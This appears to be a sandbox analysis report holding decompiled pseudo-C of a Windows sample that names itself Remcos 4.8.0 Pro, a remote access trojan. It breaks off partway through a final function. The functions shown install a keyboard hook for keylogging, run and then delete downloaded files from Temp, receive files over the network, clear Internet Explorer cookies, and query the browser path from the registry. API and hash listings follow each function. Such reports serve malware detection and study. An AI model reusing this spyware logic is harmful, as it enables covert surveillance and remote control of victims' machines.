                    				_t87 = E004052FD(_t60,  &_v112, E0043BA9A(_t60, __eflags, "Temp"), _t90, _t94, _t33);
                    				E00402F10(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
                    				E00401FD8();
                    				_t68 =  &_v136;
                    				E00401FD8();
                    				_push(_t68);
                    				_push(_t68);
                    				_t41 = E004179B1(E0040F9BC( &_v316, _t35, _t94, E00401FAB( &_v28), 0x10),  &_v316);
                    				_t95 = _t41;
                    				if(_t41 == 0) {
                    					E00402093(_t60, _t91 - 0x18, _t87, _t90, 0x465094);
                    					_push(0x6f);
                    					_t73 = 0x474618;
                    					goto L6;
                    				} else {
                    					_t87 =  &_a28;
                    					E004179C1( &_v316,  &_a28, _t95);
                    					E0040F96D( &_v316,  &_a28, _t95);
                    					_v88.hwnd = _v88.hwnd & 0x00000000;
                    					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                    					_v88.cbSize = 0x3c;
                    					_v88.fMask = 0x40;
                    					_t50 = E00401FAB( &_v28);
                    					asm("movaps xmm0, [0x46c220]");
                    					_v88.lpFile = _t50;
                    					asm("movups [ebp-0x40], xmm0");
                    					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                    					_t97 = _v88.hProcess;
                    					if(_v88.hProcess != 0) {
                    						E00402093(_t60, _t91,  &_a28, _t90, 0x465094);
                    						_push(0x70);
                    						E00404AA1(0x474618, _t87, _t97);
                    						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                    						CloseHandle(_v88.hProcess);
                    						DeleteFileA(E00401FAB( &_v28));
                    					}
                    					_t98 = _t60 - 1;
                    					if(_t60 == 1) {
                    						E00402093(_t60, _t91 - 0x18, _t87, _t90, 0x465094);
                    						_push(0x6e);
                    						_t73 = 0x474618;
                    						L6:
                    						E00404AA1(_t73, _t87, _t98);
                    					}
                    				}
                    				E0040F1B9(_t60,  &_v316, 0x465094);
                    				E00401FD8();
                    				E00401FD8();
                    				return E00401FD8();
                    			}



















                    0x00417774
                    0x0041778f
                    0x004177ab
                    0x004177b0
                    0x004177b9
                    0x004177be
                    0x004177c4
                    0x004177c9
                    0x004177ca
                    0x004177e7
                    0x004177ec
                    0x004177ee
                    0x004178af
                    0x004178b4
                    0x004178b6
                    0x00000000
                    0x004177f4
                    0x004177f4
                    0x004177fd
                    0x00417808
                    0x0041780d
                    0x00417814
                    0x00417818
                    0x0041781f
                    0x00417826
                    0x0041782b
                    0x00417832
                    0x00417839
                    0x0041784f
                    0x00417852
                    0x00417856
                    0x0041785e
                    0x00417863
                    0x00417867
                    0x00417871
                    0x0041787a
                    0x00417889
                    0x00417889
                    0x0041788f
                    0x00417892
                    0x0041789a
                    0x0041789f
                    0x004178a1
                    0x004178bb
                    0x004178bb
                    0x004178bb
                    0x00417892
                    0x004178c6
                    0x004178ce
                    0x004178d6
                    0x004178e9

                    APIs
                      • Part of subcall function 004179C1: __EH_prolog.LIBCMT ref: 004179C6
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465094), ref: 00417871
                    • CloseHandle.KERNEL32(00000000), ref: 0041787A
                    • DeleteFileA.KERNEL32(00000000), ref: 00417889
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 0041783D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: <$@$Temp
                    • API String ID: 1704390241-1032778388
                    • Opcode ID: 493b4832d0e8e269e08e80504663f71bb163043b99099d737a0da3a9acc33917
                    • Instruction ID: efaa485e19d4a2be4a805d90fe521bfee85b6f414846a1147dc768879dff20cd
                    • Opcode Fuzzy Hash: 493b4832d0e8e269e08e80504663f71bb163043b99099d737a0da3a9acc33917
                    • Instruction Fuzzy Hash: 2C418D719002099ADB14FBA2DC56AFD7735AF40308F50017EF606760E2EF7C1A8ACB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0040788A(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
                    				long _v0;
                    				char _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				void* __ebx;
                    				void* __ebp;
                    				WCHAR* _t35;
                    				long _t42;
                    				struct _OVERLAPPED* _t54;
                    				intOrPtr _t72;
                    				intOrPtr _t74;
                    				long _t76;
                    				void* _t77;
                    				void* _t78;
                    				void* _t80;
                    				void* _t82;
                    				void* _t83;
                    				void* _t85;
                    
                    				_t82 = __eflags;
                    				E004570C0();
                    				_push(_t77);
                    				_t74 = __ecx;
                    				_t69 =  &_a100080;
                    				asm("xorps xmm0, xmm0");
                    				_a8 = __ecx;
                    				_t54 = 0;
                    				asm("movlpd [esp+0x10], xmm0");
                    				_a12 = 0;
                    				E00403262(0,  &_a16, _t77, _t82, E00409082( &_a40,  &_a100080, _t77, L".part"));
                    				E00401F09();
                    				_t78 = CreateFileW(E00401F04( &_a12), 4, 0, 0, 2, 0x80, 0);
                    				_t83 = _v0 - _a100072;
                    				if(_t83 > 0) {
                    					L6:
                    					CloseHandle(_t78);
                    					_t35 = E00401F04( &_a100080);
                    					MoveFileW(E00401F04( &_a16), _t35);
                    					_t54 = 1;
                    				} else {
                    					_t72 = _a100072;
                    					if(_t83 >= 0) {
                    						L5:
                    						if(_v0 < _t72) {
                    							goto L2;
                    						} else {
                    							goto L6;
                    						}
                    					} else {
                    						while(1) {
                    							L2:
                    							_t42 = E00404B96(_t74,  &_a64, 0x186a0);
                    							_t76 = _t42;
                    							asm("cdq");
                    							_v12 = _v12 + _t42;
                    							asm("adc [esp+0x18], edx");
                    							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
                    							_t80 = _t80 - 0x18;
                    							E004020B7(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
                    							E00404AA1(_v12, _t69, _t83, 0x57, _v12);
                    							if(_t76 <= 0) {
                    								break;
                    							}
                    							_t74 = _v16;
                    							_t85 = _v20 - _a100052;
                    							if(_t85 < 0) {
                    								continue;
                    							} else {
                    								if(_t85 > 0) {
                    									goto L6;
                    								} else {
                    									goto L5;
                    								}
                    							}
                    							goto L7;
                    						}
                    						CloseHandle(_t78);
                    						DeleteFileW(E00401F04( &_v8));
                    					}
                    				}
                    				L7:
                    				E00401F09();
                    				E00401F09();
                    				return _t54;
                    			}






















                    0x0040788a
                    0x0040788f
                    0x00407895
                    0x00407897
                    0x00407899
                    0x004078a1
                    0x004078a4
                    0x004078a8
                    0x004078aa
                    0x004078b9
                    0x004078c8
                    0x004078d1
                    0x004078f2
                    0x004078fb
                    0x004078ff
                    0x00407973
                    0x00407974
                    0x00407981
                    0x00407991
                    0x00407997
                    0x00407901
                    0x00407901
                    0x00407908
                    0x0040796d
                    0x00407971
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040790a
                    0x0040790a
                    0x0040790a
                    0x00407917
                    0x0040791c
                    0x0040791e
                    0x0040791f
                    0x00407928
                    0x00407934
                    0x0040793a
                    0x00407946
                    0x00407951
                    0x00407958
                    0x00000000
                    0x00000000
                    0x00407961
                    0x00407965
                    0x00407969
                    0x00000000
                    0x0040796b
                    0x0040796b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040796b
                    0x00000000
                    0x00407969
                    0x004079bc
                    0x004079cc
                    0x004079cc
                    0x00407908
                    0x00407999
                    0x0040799d
                    0x004079a9
                    0x004079ba

                    APIs
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00473EC8,00464F94,?,00000000,00407F23,00000000), ref: 004078EC
                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407F23,00000000,?,?,0000000A,00000000), ref: 00407934
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • CloseHandle.KERNEL32(00000000,?,00000000,00407F23,00000000,?,?,0000000A,00000000), ref: 00407974
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407991
                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 004079BC
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 004079CC
                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00473EE0,00404C49,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404BA5
                      • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                    • String ID: .part
                    • API String ID: 1303771098-3499674018
                    • Opcode ID: 4cecbec0c4395de220c6909cc3a4f63e511167a9bb99195290f4dab11b30edd1
                    • Instruction ID: 33ea802e8d5612ad076aea3bfb6c614ddc8d5d21a9b026d6efa95f66c5288df6
                    • Opcode Fuzzy Hash: 4cecbec0c4395de220c6909cc3a4f63e511167a9bb99195290f4dab11b30edd1
                    • Instruction Fuzzy Hash: 4A31A4715083059FD210EB21C84599FB7A8FF84359F00493EF585B2192EF78EA48CB9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0041B11F(void* __ecx, void* __eflags) {
                    				char _v8;
                    				char _v12;
                    				char _v16;
                    				char _v20;
                    				char _v44;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t23;
                    				intOrPtr* _t25;
                    				intOrPtr* _t27;
                    				void* _t34;
                    				void* _t43;
                    				char* _t50;
                    				void* _t57;
                    				void* _t60;
                    				void* _t61;
                    				void* _t65;
                    
                    				_t65 = __eflags;
                    				_t34 = __ecx;
                    				E004131C9(__ecx, 0x80000000, L"http\\shell\\open\\command", 0);
                    				E00445196(E00401F04(_t34));
                    				E00401F13(_t34, 0x80000000, _t57, E00408F35(_t34,  &_v44, 0, E0041C8F1(_t34, L".exe") + 4));
                    				E00401F09();
                    				_t43 = _t61 - 0x18;
                    				E00408F83(_t34, _t43, 0x80000000, _t65, _t34);
                    				_push(_t43);
                    				E00401F13(_t34, 0x80000000, _t57, E0041B7D7( &_v44, 0x80000000));
                    				E00401F09();
                    				_t5 =  &_v8; // 0x474320
                    				_t23 = E00402305(_t34, _t5);
                    				_t25 = E004022CA(_t34,  &_v12);
                    				_t27 = E00402305(_t34,  &_v16);
                    				_t50 =  &_v20;
                    				E00409B02(_t50,  *_t27,  *_t25,  *_t23);
                    				if(E0041BA4C(_t50) != 0) {
                    					_push(_t50);
                    					_t56 = L"program files\\";
                    					_t59 = E0041C8F1(_t34, L"program files\\");
                    					if(_t31 != 0xffffffff) {
                    						E0041C962(_t34, _t34, 0x80000000, _t56, _t60, _t59, E0043B4CB(L"program files\\"), L"program files (x86)\\");
                    					}
                    				}
                    				return _t34;
                    			}






















                    0x0041b11f
                    0x0041b134
                    0x0041b136
                    0x0041b145
                    0x0041b16a
                    0x0041b172
                    0x0041b17a
                    0x0041b17d
                    0x0041b182
                    0x0041b191
                    0x0041b199
                    0x0041b19e
                    0x0041b1a4
                    0x0041b1b1
                    0x0041b1be
                    0x0041b1c5
                    0x0041b1cc
                    0x0041b1db
                    0x0041b1dd
                    0x0041b1de
                    0x0041b1eb
                    0x0041b1f0
                    0x0041b202
                    0x0041b202
                    0x0041b1f0
                    0x0041b20f

                    APIs
                      • Part of subcall function 004131C9: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,X2}), ref: 004131EB
                      • Part of subcall function 004131C9: RegQueryValueExW.ADVAPI32(?,0040F11C,00000000,00000000,?,00000400), ref: 0041320A
                      • Part of subcall function 004131C9: RegCloseKey.ADVAPI32(?), ref: 00413213
                      • Part of subcall function 0041BA4C: GetCurrentProcess.KERNEL32(?,?,?,0040D8B3,WinDir,00000000,00000000), ref: 0041BA5D
                      • Part of subcall function 0041BA4C: IsWow64Process.KERNEL32(00000000,?,?,0040D8B3,WinDir,00000000,00000000), ref: 0041BA64
                    • _wcslen.LIBCMT ref: 0041B1F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                    • String ID: CG$.exe$X2}$http\shell\open\command$program files (x86)\$program files\
                    • API String ID: 3286818993-3458641591
                    • Opcode ID: 829473e96849a59aca4098161f78f698ac2698bea52230d7e7c3f3159bf098f0
                    • Instruction ID: df79734808bf15fc06272abcbfcce018f80c5313eedc6c21ed59e635eef28131
                    • Opcode Fuzzy Hash: 829473e96849a59aca4098161f78f698ac2698bea52230d7e7c3f3159bf098f0
                    • Instruction Fuzzy Hash: D621A772B0010827DB14BAB58C96AEE766DDB44328F14053FF406B72D2FE3C9D4842A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040BD5E(void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v340;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t17;
                    				void* _t20;
                    				int _t34;
                    				void* _t40;
                    				void* _t41;
                    				char* _t42;
                    				void* _t48;
                    				void* _t60;
                    				void* _t62;
                    				void* _t63;
                    				void* _t64;
                    
                    				_t42 =  &_v28;
                    				E004020DF(_t40, _t42);
                    				_push(_t42);
                    				_t41 = 0;
                    				_t17 = E00413154( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                    				_t64 = _t63 + 0xc;
                    				E00401FE2( &_v28, 0x80000001, _t60, _t17);
                    				E00401FD8();
                    				_t59 = 0x465094;
                    				_t20 = E00405B05(0x465094);
                    				_t68 = _t20;
                    				if(_t20 == 0) {
                    					ExpandEnvironmentStringsA(E00401FAB( &_v28),  &_v340, 0x104);
                    					__eflags = PathFileExistsA( &_v340);
                    					if(__eflags == 0) {
                    						goto L1;
                    					} else {
                    						E00402093(0,  &_v52, 0x465094, _t62,  &_v340);
                    						_t59 =  &_v52;
                    						_t34 = E0041BD26(E00401F04(E0041B6F3( &_v76,  &_v52)),  &_v52);
                    						E00401F09();
                    						E00401FD8();
                    						__eflags = _t34;
                    						if(__eflags == 0) {
                    							__eflags = E00406A08(0x4749e8, "XP", 0);
                    							if(__eflags != 0) {
                    								_t41 = 1;
                    								E00402093(1, _t64 - 0x18,  &_v52, _t62, "\n[IE cookies cleared!]");
                    								E0040C04D(1,  &_v52, _t62, __eflags);
                    								goto L8;
                    							}
                    						} else {
                    							_t48 = _t64 - 0x18;
                    							_push("\n[IE cookies cleared!]");
                    							goto L2;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t48 = _t64 - 0x18;
                    					_push("\n[IE cookies not found]");
                    					L2:
                    					E00402093(_t41, _t48, _t59, _t62);
                    					E0040C04D(_t41, _t59, _t62, _t68);
                    					_t41 = 1;
                    					L8:
                    				}
                    				E00401FD8();
                    				return _t41;
                    			}





















                    0x0040bd67
                    0x0040bd6c
                    0x0040bd71
                    0x0040bd84
                    0x0040bd86
                    0x0040bd8b
                    0x0040bd92
                    0x0040bd9a
                    0x0040bd9f
                    0x0040bda7
                    0x0040bdac
                    0x0040bdae
                    0x0040bde0
                    0x0040bdf3
                    0x0040bdf5
                    0x00000000
                    0x0040bdf7
                    0x0040be01
                    0x0040be06
                    0x0040be1a
                    0x0040be24
                    0x0040be2c
                    0x0040be31
                    0x0040be33
                    0x0040be54
                    0x0040be56
                    0x0040be5b
                    0x0040be64
                    0x0040be69
                    0x00000000
                    0x0040be69
                    0x0040be35
                    0x0040be38
                    0x0040be3a
                    0x00000000
                    0x0040be3a
                    0x0040be33
                    0x0040bdb0
                    0x0040bdb0
                    0x0040bdb3
                    0x0040bdb5
                    0x0040bdba
                    0x0040bdba
                    0x0040bdbf
                    0x0040bdc4
                    0x0040be6e
                    0x0040be6e
                    0x0040be74
                    0x0040be80

                    APIs
                      • Part of subcall function 00413154: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413178
                      • Part of subcall function 00413154: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413195
                      • Part of subcall function 00413154: RegCloseKey.KERNEL32(?), ref: 004131A0
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BDE0
                    • PathFileExistsA.SHLWAPI(?), ref: 0040BDED
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$IG
                    • API String ID: 1133728706-2631792663
                    • Opcode ID: 82c17007e6d9936a12ad4ab7e9250510a34b1ed73d864342b128ad85130f1b41
                    • Instruction ID: c95189950094806de1a537e7eb5ee4259ee4e1c8d42eedd3bb86a11e380aad6e
                    • Opcode Fuzzy Hash: 82c17007e6d9936a12ad4ab7e9250510a34b1ed73d864342b128ad85130f1b41
                    • Instruction Fuzzy Hash: A6213A71A002199ACB04B7A6CC569EEB329AF51705F80006FA602762D2EF785949C6DA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0040A1DF(struct HHOOK__** __ecx) {
                    				struct tagMSG _v32;
                    				char _v60;
                    				void* _v64;
                    				void* __edi;
                    				void* __ebp;
                    				int _t7;
                    				void* _t8;
                    				struct HHOOK__* _t14;
                    				void* _t16;
                    				void* _t22;
                    				struct HHOOK__** _t34;
                    				void* _t36;
                    				signed int _t37;
                    				void* _t39;
                    
                    				_t39 = (_t37 & 0xfffffff8) - 0x38;
                    				_t34 = __ecx;
                    				 *0x471b24 = __ecx;
                    				if( *((intOrPtr*)(__ecx)) != 0) {
                    					goto L3;
                    				} else {
                    					_t14 = SetWindowsHookExA(0xd, E0040A1CB, GetModuleHandleA(0), 0);
                    					 *_t34 = _t14;
                    					_t44 = _t14;
                    					if(_t14 != 0) {
                    						while(1) {
                    							L3:
                    							_t7 = GetMessageA( &_v32, 0, 0, 0);
                    							__eflags = _t7;
                    							if(_t7 == 0) {
                    								break;
                    							}
                    							TranslateMessage( &_v32);
                    							DispatchMessageA( &_v32);
                    							__eflags =  *_t34;
                    							if( *_t34 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						_t8 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t16 = E0041B623(_t22,  &_v60, GetLastError());
                    						_t40 = _t39 - 0x18;
                    						E004052FD(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16);
                    						E00402093(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E");
                    						E0041AF84(_t22, 0);
                    						E00401FD8();
                    						_t8 = 1;
                    					}
                    				}
                    				return _t8;
                    			}

















                    0x0040a1e5
                    0x0040a1e9
                    0x0040a1ee
                    0x0040a1f6
                    0x00000000
                    0x0040a1f8
                    0x0040a208
                    0x0040a20e
                    0x0040a210
                    0x0040a212
                    0x0040a25a
                    0x0040a25a
                    0x0040a262
                    0x0040a268
                    0x0040a26a
                    0x00000000
                    0x00000000
                    0x0040a271
                    0x0040a27c
                    0x0040a282
                    0x0040a284
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040a284
                    0x0040a286
                    0x0040a286
                    0x0040a214
                    0x0040a220
                    0x0040a225
                    0x0040a230
                    0x0040a23f
                    0x0040a244
                    0x0040a250
                    0x0040a257
                    0x0040a257
                    0x0040a212
                    0x0040a28d

                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A1FA
                    • SetWindowsHookExA.USER32 ref: 0040A208
                    • GetLastError.KERNEL32 ref: 0040A214
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    • GetMessageA.USER32 ref: 0040A262
                    • TranslateMessage.USER32(?), ref: 0040A271
                    • DispatchMessageA.USER32 ref: 0040A27C
                    Strings
                    • Keylogger initialization failure: error , xrefs: 0040A228
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: 3a8a3cd8c74c715fbd1b0089af7ec9cc905667274a3e3abe2ac25cf1aea5a781
                    • Instruction ID: cce19b8492fd365a2faec1a6a8714155296faf3780a198998de89aaa9d1f15cd
                    • Opcode Fuzzy Hash: 3a8a3cd8c74c715fbd1b0089af7ec9cc905667274a3e3abe2ac25cf1aea5a781
                    • Instruction Fuzzy Hash: C611BF326003016BC7107B769C0A86B77ECEBD5712B100A7EF885E2291EE39D510CB6B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E0041C7B9(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                    				char _v104;
                    				struct HWND__* _t7;
                    				void* _t24;
                    				void* _t28;
                    
                    				_t28 = __edi;
                    				_t26 = __ecx;
                    				_t24 = __ecx;
                    				AllocConsole();
                    				_t7 =  *0x473b18(__ebx);
                    				_t32 = _t24;
                    				 *0x473b1c = _t7;
                    				if(_t24 == 0) {
                    					ShowWindow(_t7, 0);
                    				}
                    				E00441602(_t26, "CONOUT$", "a", E0043BB78(1));
                    				SetConsoleOutputCP(0x4e4);
                    				E0041C776();
                    				E004368A0(_t28,  &_v104, 0, 0x64);
                    				E00441940( &_v104, "\n\tRemcos v");
                    				E00441940( &_v104, "4.8.0 Pro");
                    				E00441940( &_v104, 0x46beb8);
                    				_push( &_v104);
                    				return E00407127(_t32);
                    			}







                    0x0041c7b9
                    0x0041c7b9
                    0x0041c7c0
                    0x0041c7c2
                    0x0041c7c8
                    0x0041c7ce
                    0x0041c7d0
                    0x0041c7d6
                    0x0041c7db
                    0x0041c7db
                    0x0041c7f3
                    0x0041c800
                    0x0041c806
                    0x0041c813
                    0x0041c821
                    0x0041c82f
                    0x0041c83d
                    0x0041c845
                    0x0041c851

                    APIs
                    • AllocConsole.KERNEL32(00474320), ref: 0041C7C2
                    • GetConsoleWindow.KERNEL32 ref: 0041C7C8
                    • ShowWindow.USER32(00000000,00000000), ref: 0041C7DB
                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041C800
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$Window$AllocOutputShow
                    • String ID: Remcos v$4.8.0 Pro$CONOUT$
                    • API String ID: 4067487056-3489386281
                    • Opcode ID: 988599f30d8b73a20b0f075c47d03a82de39375ccb1a0868cc0b76e992cea38f
                    • Instruction ID: efedfb15839f7255dd5c89c9c5e3caf175ac9a385f919c8129f91d5680e4116d
                    • Opcode Fuzzy Hash: 988599f30d8b73a20b0f075c47d03a82de39375ccb1a0868cc0b76e992cea38f
                    • Instruction Fuzzy Hash: 79011EB1A803087AD600FBF19D4BF8D736C9B14706F54002BBA08AA1D2EA69A5544B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E0044A658(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				int _v12;
                    				void* _v24;
                    				signed int _t49;
                    				signed int _t54;
                    				int _t58;
                    				signed int _t60;
                    				short* _t62;
                    				signed int _t66;
                    				short* _t70;
                    				int _t71;
                    				int _t78;
                    				short* _t81;
                    				signed int _t87;
                    				signed int _t90;
                    				void* _t95;
                    				void* _t96;
                    				int _t98;
                    				short* _t101;
                    				int _t103;
                    				signed int _t106;
                    				short* _t107;
                    				void* _t110;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t49 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t49 ^ _t106;
                    				_push(__esi);
                    				_t103 = _a20;
                    				if(_t103 > 0) {
                    					_t78 = E00446156(_a16, _t103);
                    					_t110 = _t78 - _t103;
                    					_t4 = _t78 + 1; // 0x1
                    					_t103 = _t4;
                    					if(_t110 >= 0) {
                    						_t103 = _t78;
                    					}
                    				}
                    				_t98 = _a32;
                    				if(_t98 == 0) {
                    					_t98 =  *( *_a4 + 8);
                    					_a32 = _t98;
                    				}
                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                    				_v12 = _t54;
                    				if(_t54 == 0) {
                    					L38:
                    					return E004349BB(_v8 ^ _t106);
                    				} else {
                    					_t95 = _t54 + _t54;
                    					_t85 = _t95 + 8;
                    					asm("sbb eax, eax");
                    					if((_t95 + 0x00000008 & _t54) == 0) {
                    						_t81 = 0;
                    						__eflags = 0;
                    						L14:
                    						if(_t81 == 0) {
                    							L36:
                    							_t105 = 0;
                    							L37:
                    							E0043585D(_t81);
                    							goto L38;
                    						}
                    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                    						_t121 = _t58;
                    						if(_t58 == 0) {
                    							goto L36;
                    						}
                    						_t100 = _v12;
                    						_t60 = E004485C2(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                    						_t105 = _t60;
                    						if(_t105 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t96 = _t105 + _t105;
                    							_t87 = _t96 + 8;
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							__eflags = _t87 & _t60;
                    							if((_t87 & _t60) == 0) {
                    								_t101 = 0;
                    								__eflags = 0;
                    								L30:
                    								__eflags = _t101;
                    								if(__eflags == 0) {
                    									L35:
                    									E0043585D(_t101);
                    									goto L36;
                    								}
                    								_t62 = E004485C2(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									goto L35;
                    								}
                    								_push(0);
                    								_push(0);
                    								__eflags = _a28;
                    								if(_a28 != 0) {
                    									_push(_a28);
                    									_push(_a24);
                    								} else {
                    									_push(0);
                    									_push(0);
                    								}
                    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                    								__eflags = _t105;
                    								if(_t105 != 0) {
                    									E0043585D(_t101);
                    									goto L37;
                    								} else {
                    									goto L35;
                    								}
                    							}
                    							_t90 = _t96 + 8;
                    							__eflags = _t96 - _t90;
                    							asm("sbb eax, eax");
                    							_t66 = _t60 & _t90;
                    							_t87 = _t96 + 8;
                    							__eflags = _t66 - 0x400;
                    							if(_t66 > 0x400) {
                    								__eflags = _t96 - _t87;
                    								asm("sbb eax, eax");
